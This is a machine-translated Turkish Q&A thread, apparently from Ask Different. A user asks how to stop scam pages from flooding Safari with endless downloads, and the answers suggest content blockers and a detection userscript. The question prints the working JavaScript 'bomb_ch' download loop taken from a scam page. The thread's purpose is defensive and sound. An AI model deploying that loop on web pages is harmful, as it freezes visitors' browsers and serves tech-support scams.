Safari'de Spam Yüklemelerini Önleme

Arka fon

Birçok "şüpheli" sitede (film siteleri vb.) Yeni bir spam sayfası görünmeye başladı. Bu yeni spam sayfası, sahte taramalar, MacKeeper, "VİRÜSÜNÜZ VAR", vb. Kategorisine sığar.

Sorun

Bu yeni sayfadaki sorun, sadece bir pop-up'a sahip olmak yerine, sayfanın rastgele bir 2kb (zararlı değil sadece rastgele metin içerir) dosyalarının her ~ 1ms'de tekrar tekrar başlatılmasıdır. İndirme klasörü, pencereyi kapatmadan önce dolar ve 1000'den fazla dosyayı silmeye devam edersiniz. Sayfa spam'inin yazdırma iletişim kutusunu açtığı benzer bir sorunun aksine, tepki vermek için çok az zaman vardır.

Başarısız Sorun Giderme Denemeleri

• İndirme klasörünü kilitlemeyi denedim. İndirme işlemlerinin ... iyi ... indirilmesini engellerken, bir iletişim kutusu (resme bakın) gelir. Genellikle, bu iletişim kutusunu kapatabilirim, ancak indirme her ~ 1ms'de denendiğinden, her kapatmaya çalıştığımda pencereyi kapatmamı engelleyen yeni bir iletişim kutusu açılır.

• İndirmeyi durduran (1k indirmeden sonra) Safari'den çıkmaya zorla ama diğer tüm pencerelerimi kaybettim

• Safari tercihlerinde ayarları 'Her indirme için sor' olarak değiştirme. Çalışmıyor çünkü 1k'nin ayrı iletişim kutuları açık sekmeyi kapatmamı bile engelliyor. Sonunda Safari çöküyor.

Soru

Safari'de spam indirmelerini nasıl önleyebilirim?

GÜNCELLEME:

İndirmeye neden olan kodu heres (JavaScript'i devre dışı bırakarak ve kodu manuel olarak inceleyerek aldım):

 function download(g, h, j) {
                var k = new Blob([g], {
                        type: j
                });
                if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
                else {
                        var l = document.createElement("a"),
                                m = URL.createObjectURL(k);
                        l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
                }
        }
        function bomb_ch() {
                var g = Math.random().toString(36).substring(20),
                        h = Math.floor(50 * Math.random() + 25);
                while (true) download(h, g, g)
        }
        function ch_jam() {
                bomb_ch()
        }

Not: JS'yi özel bir sayfada çalıştırırken bazı sorunlar yaşadım. İndirmek yerine dondu. Bir setInterval()fonksiyonu çağıran bir fonksiyon kullanarak indirmeyi taklit edebildim download.

Daha fazla bilgi: https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/

Seçici bir Safari içerik engelleyicisi / javascript engelleyicisi için bu iyi bir durum olmaz mı?

Ghostery , siteler arası komut dosyalarını / reklam kodunu web sayfalarına yapıştırmak için önceden oluşturulmuş kuralları kullanıp kullanamayacağınızı görmek için Mac'te başlamak için iyi bir yer olabilir. Tabii ki, sayfa bu içeriği doğrudan yayınlıyorsa, o sayfadaki javascript'i tamamen devre dışı bırakmanız veya not almanız ve deneyiminizi bilerek ya da araçlarını kullanarak herkese reklam enjeksiyonu satması nedeniyle sitenizi engellemeniz gerekir. Bu korkutucu eşya ve aldatmaca eşya göze.

Daha kesin olmak istiyorsanız - GreaseMonkey tipi kullanıcı komut dosyaları, sizin tarafınızda yeterli JS bilgisi ile mücadele edebilir (veya bugünün bu kötü amaçlı yazılımın yinelenmesini engellemek için komut dosyasını yazan birini bulabilir).

• https://tampermonkey.net/?browser=safari
• https://www.greasespot.net

Düzenleyen @JBis

Aşağıdaki kullanıcı metni, sayfayı engelleme konusunda başarılıydı.

     // ==UserScript==
     // @name         The Bomb Squad
     // @version      0.1
     // @description  Blocks the pages containing any function with the bomb_ch function detailed in /apple/329594/prevent-spam-downloads-on-safari and https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/
     // @author       Josh Brown (@JBis https://apple.stackexchange.com/users/263848/jbis)
     // @match        *
     // @grant        none

    // ==/UserScript==

   if (typeof bomb_ch === "function") {
     document.getElementsByTagName("body")[0].innerHTML="<h1>Page Defused by The Bomb Squad</h1><p>Because it contatained the following
 function(s):  <pre>bomb_ch()</pre> <br>";
    }

Not: Sp (c) ammers, bomb_ch()fonksiyonu rastgele dağıtarak bunu kolayca atlayabilir .

Safari'nin yeni işletim sistemi sürümleri bunu biraz azaltmaya yardımcı olabilir, ancak bu bok yükünü Mac'inize dağıtan insanlar tarafından kazanılacak para vardır, böylece engellenmeyi kolaylaştıran herhangi bir teknolojiye adapte olurlar. "Köstebek patlatmak" ve charlatans kazan dairelerinde yeni kod pişirir daha hızlı adapte bir ayar kitaplığı tutan bir işletmeyi desteklemek için daha fazla para harcamak istemiyorsanız .

Ayrıca, bunu yapan web sitelerinin de konunun bir parçası olan şarlatanlar olup olmadığına karar vermelisiniz, çünkü bunun size ev sahipliği yaptığı ziyaretçilerden biri olduğunu bilmelidirler.

Safari için birçok yetenekli reklam engelleyici olsa da, daha geniş spektrumlu, uzantı tabanlı içerik engelleyiciler için çok daha az seçenek var. Bunlardan sadece iki tanesi öne çıkıyor: Ghostery ve uBlockOrigin [ bilgi bağlantısı: https://github.com/gorhill/uBlock indirme bağlantısı: https://safari-extensions.apple.com/?q=ublock%20origin .

EDIT: uBlock Origin benzer adıyla uBlock karıştırmayın . İki ürün yetenek ve itibar bakımından oldukça farklıdır.

İstediğinizi yapabilirler ve arkadaşlarınızın deneyimli bombalamasını önleyebilirler mi? Evet, Ghostery'in uBlockOrigin'in varsayılan olarak yapması için ayarlandığı bazı kuralların özelleştirilmesine ihtiyaç duyacağı ayrımıyla.

UBlockOrigin'in "Daha fazla bilgi" bağlantınızdaki Malwarebytes duyurusundan bir ay önce bu özel açığı engellediğini biliyorum. Ghostery'nin zaman çizelgesini bilmiyorum.

Her ikisini de denemenizi tavsiye ederim.